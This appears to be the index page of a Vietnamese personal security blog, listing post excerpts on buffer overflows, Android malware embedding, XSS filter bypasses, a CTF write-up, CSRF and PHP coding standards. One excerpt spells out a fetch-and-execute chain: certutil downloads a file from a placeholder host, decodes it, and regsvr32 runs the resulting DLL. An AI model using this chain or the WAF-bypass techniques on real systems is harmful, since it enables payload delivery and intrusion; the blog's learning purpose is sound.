Nhat Truong

Phố đi bộ Bờ Hồ

Lỗ hổng buffer overflow [Part 1]

Trong các lĩnh vực an ninh máy tính và lập trình, một lỗi tràn bộ nhớ đệm hay gọi tắt là lỗi tràn bộ đệm là một lỗi lập trình có thể gây ra một ngoại lệ truy nhập bộ nhớ máy tính và chương trình bị kết thúc, hoặc khi người dùng có ýContinue reading “Lỗ hổng buffer overflow [Part 1]”

[Note] tải file windows với Certutil

copy: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html 1. Create your DLL 2. Base64encode it (optional) 3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down 4. Base64decode the file with certutil 5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

[Malware, Android] Nhúng mã độc vào trong ứng dụng Android?

Bài viết hay note lại vào blog :D: https://blog.0x1115.org/2016/03/18/nhung-ma-doc-vao-trong-ung-dung-android/ Đừng bao giờ cài đặt các ứng dụng được chia sẻ miễn phí, tự do và dễ dàng download trên mạng xã hội. Hãy xem thật kĩ nguồn gốc và quyền mà ứng dụng đòi hỏi. Để điện thoại ra xa tầm tay trẻ emContinue reading “[Malware, Android] Nhúng mã độc vào trong ứng dụng Android?”

Scan shell tool for BlackBox

Chôm code trên twitter

Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm Cloudflare XSS Bypass XXS Bypass Imperva WAF Bypass WAF Amazon Crlf injection to bypass javascript: Đang bị bờ lách lít Trong trường hợp svg onload= bị filter, %0d sẽ đóng vai trò dấu ngăn cách vàContinue reading “Một số cách bypass XSS filter”

Basic Coding Standard trong PHP

Chương này của bộ standard bao gồm những yếu tố cơ bản được đòi hỏi để có thể đảm bảo tính tương kết giữa code PHP được chia sẻ. 1. Khái quát chung Files chỉ được sử dụng tag là <?php và <?= . Files phải encode bằng UTF-8, không dùng BOM (byte-order mark) FilesContinue reading “Basic Coding Standard trong PHP”

Hướng dẫn về Coding Style – Coding Style Guide

Bộ quy tắc này dựa trên và mở rộng từ PSR-1, basic coding standard Bộ quy tắc basic coding standard được tạo ra nhằm giảm bới những khó khăn trong việc đọc code của người khác. Nó thực hiện điều đó bằng cách đặt ra những quy định hay gợi ý về việc format PHPContinue reading “Hướng dẫn về Coding Style – Coding Style Guide”

[Write up] CTF-INFOSECINSTITUTE-Practical Website Hacking level 6

Link: http://ctf.infosecinstitute.com/ctf2/exercises/ex6.php Visiting level 6 brings us to the page that you see below The task description is uses some tag allowed to want users browsers to load that page and execute the query string transferTo with the number 555 as a parameter

Tấn công CSRF

1.Mô tả chung CSRF CSRF là một cuộc tấn công mà thủ đoạn của nó là dụ nạn nhân vào tải một trang có chứa một request độc hại. Độc hại là sao :v nghĩa là từ đó kẻ tấn công được thừa hưởng quyền hạn của nạn nhân để thực hiện một chức năngContinue reading “Tấn công CSRF”